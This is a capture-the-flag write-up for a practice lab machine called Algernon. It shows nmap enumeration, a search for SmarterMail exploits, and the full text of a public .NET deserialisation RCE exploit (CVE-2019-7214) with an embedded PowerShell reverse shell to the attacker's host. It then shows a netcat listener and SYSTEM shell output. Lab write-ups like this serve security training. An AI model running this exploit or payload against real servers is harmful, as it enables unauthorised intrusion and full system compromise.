Algernon
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.171.65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-11 01:13 EST
Nmap scan report for 192.168.171.65
Host is up, received echo-reply ttl 125 (0.12s latency).
Scanned at 2025-11-11 01:13:35 EST for 208s
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-29-20 09:31PM <DIR> ImapRetrieval
| 11-10-25 10:12PM <DIR> Logs
| 04-29-20 09:31PM <DIR> PopRetrieval
|_11-10-25 10:12PM <DIR> Spool
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
5040/tcp open unknown syn-ack ttl 125
9998/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| uptime-agent-info: HTTP/1.1 400 Bad Request\x0D
| Content-Type: text/html; charset=us-ascii\x0D
| Server: Microsoft-HTTPAPI/2.0\x0D
| Date: Tue, 11 Nov 2025 06:16:49 GMT\x0D
| Connection: close\x0D
| Content-Length: 326\x0D
| \x0D
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">\x0D
| <HTML><HEAD><TITLE>Bad Request</TITLE>\x0D
| <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>\x0D
| <BODY><h2>Bad Request - Invalid Verb</h2>\x0D
| <hr><p>HTTP Error 400. The request verb is invalid.</p>\x0D
|_</BODY></HTML>\x0D
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was /interface/root
|_http-favicon: Unknown favicon MD5: 9D7294CAAB5C2DF4CD916F53653714D5
|_http-server-header: Microsoft-IIS/10.0
17001/tcp open remoting syn-ack ttl 125 MS .NET Remoting services
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>FTP (21):
I logged in as anonymous, but did not find anything useful.
HTTP (80):
Just this page.
HTTP (9998):
If we browsed to that port:
We have smartermail running, I could not login with default credentials.
Lets view the source code to try to find the exact version:
Search for public exploits:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ searchsploit smartermail
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
SmarterMail 16 - Arbitrary File Upload | multiple/webapps/48580.py
SmarterMail 7.1.3876 - Directory Traversal | windows/remote/15048.txt
SmarterMail 7.3/7.4 - Multiple Vulnerabilities | asp/webapps/16955.txt
SmarterMail 8.0 - Multiple Cross-Site Scripting Vulnerabilities | asp/webapps/16975.txt
SmarterMail < 7.2.3925 - LDAP Injection | asp/webapps/15189.txt
SmarterMail < 7.2.3925 - Persistent Cross-Site Scripting | asp/webapps/15185.txt
SmarterMail Build 6985 - Remote Code Execution | windows/remote/49216.py
SmarterMail Enterprise and Standard 11.x - Persistent Cross-Site Scripting | asp/webapps/31017.php
smartermail free 9.2 - Persistent Cross-Site Scripting | windows/webapps/20362.py
SmarterTools SmarterMail 4.3 - 'Subject' HTML Injection | php/webapps/31240.txt
SmarterTools SmarterMail 5.0 - HTTP Request Handling Denial of Service | windows/dos/31607.py
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No ResultsWe will find RCE with build number close to ours.
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ searchsploit -m windows/remote/49216.py
Exploit: SmarterMail Build 6985 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/49216
Path: /usr/share/exploitdb/exploits/windows/remote/49216.py
Codes: CVE-2019-7214
Verified: False
File Type: Python script, ASCII text executable, with very long lines (4852)
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Algernon/49216.pyRead the script:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ cat 49216.py
# Exploit Title: SmarterMail Build 6985 - Remote Code Execution
# Exploit Author: 1F98D
# Original Author: Soroush Dalili
# Date: 10 May 2020
# Vendor Hompage: re
# CVE: CVE-2019-7214
# Tested on: Windows 10 x64
# References:
# https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
#
# SmarterMail before build 6985 provides a .NET remoting endpoint
# which is vulnerable to a .NET deserialisation attack.
#
#!/usr/bin/python3
import base64
import socket
import sys
from struct import pack
HOST='192.168.1.1'
PORT=17001
LHOST='192.168.1.2'
LPORT=4444
psh_shell = '$client = New-Object System.Net.Sockets.TCPClient("'+LHOST+'",'+str(LPORT)+');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.
Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendbac
k2 =$sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Clo
se()'
psh_shell = psh_shell.encode('utf-16')[2:] # remove BOM
psh_shell = base64.b64encode(psh_shell)
psh_shell = psh_shell.ljust(1360, b' ')
payload = 'AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0c<snipped>V0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw=='
payload = base64.b64decode(payload)
payload = payload.replace(bytes("X"*1360, 'utf-8'), psh_shell)
uri = bytes('tcp://{}:{}/Servers'.format(HOST, str(PORT)), 'utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))
msg = bytes()
msg += b'.NET' # Header
msg += b'\x01' # Version Major
msg += b'\x00' # Version Minor
msg += b'\x00\x00' # Operation Type
msg += b'\x00\x00' # Content Distribution
msg += pack('I', len(payload)) # Data Length
msg += b'\x04\x00' # URI Header
msg += b'\x01' # Data Type
msg += b'\x01' # Encoding - UTF8
msg += pack('I', len(uri)) # URI Length
msg += uri # URI
msg += b'\x00\x00' # Terminating Header
msg += payload # Data
s.send(msg)
s.close()As shown above, it exploits the port that we have not yet (17001).
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ nc -nv 192.168.171.65 17001
(UNKNOWN) [192.168.171.65] 17001 (?) open
asdf
.NETSystem.Runtime.Remoting.RemotingException: Tcp channel protocol violation: expecting preamble.
at System.Runtime.Remoting.Channels.Tcp.TcpSocketHandler.ReadAndMatchPreamble()
at System.Runtime.Remoting.Channels.Tcp.TcpSocketHandler.ReadVersionAndOperation(UInt16& operation)
at System.Runtime.Remoting.Channels.Tcp.TcpServerSocketHandler.ReadHeaders()
at System.Runtime.Remoting.Channels.Tcp.TcpServerTransportSink.ServiceRequest(Object state)
at System.Runtime.Remoting.Channels.SocketHandler.ProcessRequestNow()Indeed we can see there is something related to .net stuff.
Modify the script to add the target IP, and our IP and port:
<snipped>
HOST='192.168.171.65'
PORT=17001
LHOST='192.168.45.187'
LPORT=80
<snipped>Start a netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...Run the exploit:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ python3 49216.py┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.171.65] 50032
PS C:\Windows\system32> whoami
nt authority\systemWe have a reverse shell as system.
Get the flag:
PS C:\Windows\system32> type \Users\Administrator\Desktop\proof.txt
2e65abb1b3529539a12111a8084c2903Last updated